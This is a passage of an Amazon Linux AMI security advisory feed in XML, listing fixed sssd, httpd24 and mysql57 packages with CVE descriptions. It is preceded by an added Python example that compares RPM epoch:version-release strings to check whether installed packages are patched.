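Every advisory in this file ends with the package entries that fix it (name, epoch, version, release, arch), and whether a host is covered is a question of RPM version ordering. Epoch is the part people get wrong: the openssl packages here carry epoch 1, so an epoch-0 package with a higher upstream version string still sorts older. The Python below is an added example, not Amazon's tooling; it ports rpm's rpmvercmp() ordering, parses rpm -q output, and checks a set of installed packages against fixed versions copied from the openssl, docker and kernel advisories in this file. The caret operator is not handled (assumed unused in amzn1 packages), and the installed values in SAMPLE_INSTALLED are constructed, not real host output.

```python
"""Compare installed RPM epoch:version-release against an advisory's fixed versions (added example)."""

import re
from itertools import zip_longest
from typing import Dict, Tuple

EVR = Tuple[int, str, str]

# Fixed versions copied from the package entries of ALAS-2021-1541 (openssl),
# ALAS-2021-1537 (docker) and ALAS-2021-1539 (kernel); note the openssl epoch.
ADVISORY_FIXES: Dict[str, EVR] = {
    "openssl": (1, "1.0.2k", "16.154.amzn1"),
    "docker": (0, "20.10.7", "3.71.amzn1"),
    "kernel": (0, "4.14.248", "129.473.amzn1"),
}

_SEGMENT = re.compile(r"[0-9]+|[A-Za-z]+|~")


def rpmvercmp(a: str, b: str) -> int:
    """Port of rpm's rpmvercmp(): 1 if a is newer, -1 if b is newer, 0 if equal.

    Strings are split into digit runs, letter runs and tildes; separators are
    ignored. Digit runs compare numerically, letter runs lexically, a digit run
    beats a letter run, a tilde sorts before everything (even end of string),
    and when one side runs out the side with segments left is newer.
    """
    if a == b:
        return 0
    for x, y in zip_longest(_SEGMENT.findall(a), _SEGMENT.findall(b)):
        if x == y:
            continue
        if x == "~":
            return -1
        if y == "~":
            return 1
        if x is None:
            return -1
        if y is None:
            return 1
        if x.isdigit() and y.isdigit():
            xi, yi = int(x), int(y)
            if xi == yi:
                continue  # "01" and "1" are equal once leading zeros are dropped
            return 1 if xi > yi else -1
        if x.isdigit():
            return 1
        if y.isdigit():
            return -1
        return 1 if x > y else -1
    return 0


def evr_compare(a: EVR, b: EVR) -> int:
    """Compare (epoch, version, release) tuples the way rpm and yum order packages.

    Epoch is decisive: (0, "1.1.1k", ...) is older than (1, "1.0.2k", ...).
    """
    if a[0] != b[0]:
        return 1 if a[0] > b[0] else -1
    c = rpmvercmp(a[1], b[1])
    if c != 0:
        return c
    return rpmvercmp(a[2], b[2])


def parse_evr(text: str) -> EVR:
    """Parse 'EPOCH:VERSION-RELEASE' as printed by rpm -q --qf '%{EPOCHNUM}:%{VERSION}-%{RELEASE}'.

    '(none)' (older rpm %{EPOCH} output) or a missing epoch is treated as 0.
    """
    epoch = 0
    if ":" in text:
        epoch_text, text = text.split(":", 1)
        if epoch_text.isdigit():
            epoch = int(epoch_text)
    version, release = text.rsplit("-", 1)
    return (epoch, version, release)


def audit(installed: Dict[str, str], fixes: Dict[str, EVR] = ADVISORY_FIXES) -> Dict[str, str]:
    """Map each installed package to 'patched', 'vulnerable' or 'not-covered'."""
    status = {}
    for name, evr_text in installed.items():
        fixed = fixes.get(name)
        if fixed is None:
            status[name] = "not-covered"
        elif evr_compare(parse_evr(evr_text), fixed) >= 0:
            status[name] = "patched"
        else:
            status[name] = "vulnerable"
    return status


# Constructed sample of rpm -qa --qf '%{NAME} %{EPOCHNUM}:%{VERSION}-%{RELEASE}\n' output.
SAMPLE_INSTALLED = {
    "openssl": "1:1.0.2k-16.150.amzn1",   # older release than the advisory: vulnerable
    "docker": "0:20.10.7-3.71.amzn1",      # exactly the fixed build: patched
    "kernel": "0:4.14.250-130.476.amzn1",  # constructed later build: patched
    "sssd": "0:1.16.4-21.26.amzn1",        # not in the table above: not-covered
}

if __name__ == "__main__":
    for name, state in audit(SAMPLE_INSTALLED).items():
        print(name, SAMPLE_INSTALLED[name], state)
```

On a real host feed parse_evr() from the rpm query shown in the comment, and remember that for the kernel the relevant package is the one currently booted (uname -r), not merely the newest one installed.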
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712" title="" id="CVE-2021-3712" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-static" version="1.0.2k" release="16.154.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.154.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.154.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.154.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.154.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.154.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.154.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.154.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.154.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.154.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.154.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.154.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.154.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.154.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.154.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.154.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.154.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.154.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.154.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.154.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1542</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1542: important priority package update for sssd</title><issued date="2021-10-01 18:01:00" /><updated date="2021-10-04 22:13:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3621:
A flaw was found in SSSD, where the sssctl command was vulnerable to shell command injection via the logs-fetch and cache-expire subcommands. This flaw allows an attacker to trick the root user into running a specially crafted sssctl command, such as via sudo, to gain root access. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
1975142: CVE-2021-3621 sssd: shell command injection in sssctl
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3621" title="" id="CVE-2021-3621" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-libsss_nss_idmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libsss_nss_idmap-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-devel-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-common-pac" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-pac-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-devel-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-client" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-client-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="python27-sss" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd" version="1.16.4" release="21.26.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/sssd-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-devel-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-tools" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-tools-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5-common" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-common-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_autofs" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_autofs-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-winbind-idmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-winbind-idmap-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-devel-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-ad" version="1.16.4" release="21.26.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/sssd-ad-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-ipa" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ipa-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="python27-sss-murmur" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-murmur-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-devel-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-common" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-debuginfo" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-debuginfo-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-dbus" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-dbus-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-devel-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-proxy" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-proxy-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="python27-libipa_hbac" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libipa_hbac-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-ldap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ldap-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_sudo" version="1.16.4" release="21.26.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libsss_sudo-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="python27-sssdconfig" version="1.16.4" release="21.26.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-sssdconfig-1.16.4-21.26.amzn1.noarch.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-devel-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-proxy" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-proxy-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_certmap-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_certmap-devel-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_certmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_certmap-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-winbind-idmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-winbind-idmap-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-ad" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ad-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-devel-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-dbus" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-dbus-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-krb5-common" version="1.16.4" release="21.26.amzn1" epoch="0" 
arch="i686"><filename>Packages/sssd-krb5-common-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_sudo" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_sudo-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libipa_hbac-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-devel-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-libwbclient" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libsss_nss_idmap-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="python27-sss" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-tools" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-tools-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_autofs" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_autofs-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="python27-libipa_hbac" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libipa_hbac-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="python27-sss-murmur" version="1.16.4" release="21.26.amzn1" epoch="0" 
arch="i686"><filename>Packages/python27-sss-murmur-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_idmap-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-devel-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-devel-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-common" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-ipa" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ipa-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_idmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-debuginfo" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-debuginfo-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-ldap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ldap-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-common-pac" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-pac-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libipa_hbac" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-client" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-client-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-krb5" version="1.16.4" release="21.26.amzn1" epoch="0" 
arch="i686"><filename>Packages/sssd-krb5-1.16.4-21.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1543</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1543: important priority package update for httpd24</title><issued date="2021-10-15 07:52:00" /><updated date="2021-10-15 15:02:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-42013:
A path traversal and remote code execution flaw was found in Apache HTTP Server 2.4.49 and 2.4.50. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally, this flaw could leak the source of interpreted files like CGI scripts. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This is an incomplete fix for CVE-2021-41773.
2011900: CVE-2021-42013 httpd: path traversal and remote code execution (incomplete fix of CVE-2021-41773)
CVE-2021-41773:
A path traversal flaw was found in Apache 2.4.49. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally, this flaw could leak the source of interpreted files like CGI scripts.
2010757: CVE-2021-41773 httpd: path traversal and file disclosure vulnerability
CVE-2021-41524:
While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.
2010934: CVE-2021-41524 httpd: NULL pointer dereference via crafted request during HTTP/2 request processing
CVE-2021-40438:
A Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. This flaw allows a remote, unauthenticated attacker to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network.
2005117: CVE-2021-40438 httpd: mod_proxy: SSRF via a crafted request uri-path containing "unix:"
CVE-2021-39275:
An out-of-bounds write in function ap_escape_quotes of httpd allows an unauthenticated remote attacker to crash the server or potentially execute code on the system with the privileges of the httpd user, by providing malicious input to the function.
2005119: CVE-2021-39275 httpd: out-of-bounds write in ap_escape_quotes() via malicious input
CVE-2021-36160:
An out-of-bounds read in mod_proxy_uwsgi of httpd allows a remote unauthenticated attacker to crash the service through a crafted request. The highest threat from this vulnerability is to system availability.
2005124: CVE-2021-36160 httpd: mod_proxy_uwsgi: out-of-bounds read via a crafted request uri-path
CVE-2021-34798:
A NULL pointer dereference in httpd allows an unauthenticated remote attacker to crash httpd by providing malformed HTTP requests. The highest threat from this vulnerability is to system availability.
2005128: CVE-2021-34798 httpd: NULL pointer dereference via malformed requests
CVE-2021-33193:
A NULL pointer dereference was found in Apache httpd mod_h2. The highest threat from this flaw is to system integrity.
1966728: CVE-2021-33193 httpd: Request splitting via HTTP/2 method injection and mod_proxy
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33193" title="" id="CVE-2021-33193" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34798" title="" id="CVE-2021-34798" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36160" title="" id="CVE-2021-36160" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39275" title="" id="CVE-2021-39275" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40438" title="" id="CVE-2021-40438" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41524" title="" id="CVE-2021-41524" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773" title="" id="CVE-2021-41773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013" title="" id="CVE-2021-42013" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_proxy_html" version="2.4.51" release="1.94.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.51-1.94.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.51" release="1.94.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.51-1.94.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.51" release="1.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.51-1.94.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.51" release="1.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.51-1.94.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.51" release="1.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.51-1.94.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.51" 
release="1.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.51-1.94.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.51" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.51-1.94.amzn1.noarch.rpm</filename></package><package name="httpd24-tools" version="2.4.51" release="1.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.51-1.94.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.51" release="1.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.51-1.94.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.51" release="1.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.51-1.94.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.51" release="1.94.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.51-1.94.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.51" release="1.94.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.51-1.94.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.51" release="1.94.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.51-1.94.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.51" release="1.94.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.51-1.94.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.51" release="1.94.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.51-1.94.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.51" release="1.94.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.51-1.94.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.51" release="1.94.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.51-1.94.amzn1.i686.rpm</filename></package><package 
name="httpd24-devel" version="2.4.51" release="1.94.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.51-1.94.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.51" release="1.94.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.51-1.94.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1544</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1544: medium priority package update for mysql57</title><issued date="2021-10-29 16:27:00" /><updated date="2021-11-04 18:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-2385:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 5.7.34 and prior and 8.0.25 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.0 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H).
1992307: CVE-2021-2385 mysql: Server: Replication unspecified vulnerability (CPU Jul 2021)
CVE-2021-2372:
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.34 and prior and 8.0.25 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1992303: CVE-2021-2372 mysql: InnoDB unspecified vulnerability (CPU Jul 2021)
CVE-2021-2356:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 5.7.34 and prior and 8.0.25 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.9 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H).
1992299: CVE-2021-2356 mysql: Server: Replication unspecified vulnerability (CPU Jul 2021)
CVE-2021-2342:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.7.34 and prior and 8.0.25 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1992294: CVE-2021-2342 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2021)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2342" title="" id="CVE-2021-2342" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2356" title="" id="CVE-2021-2356" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2372" title="" id="CVE-2021-2372" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2385" title="" id="CVE-2021-2385" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-embedded-devel" version="5.7.35" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.35" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.35" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.35" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.35" release="1.17.amzn1" epoch="0" 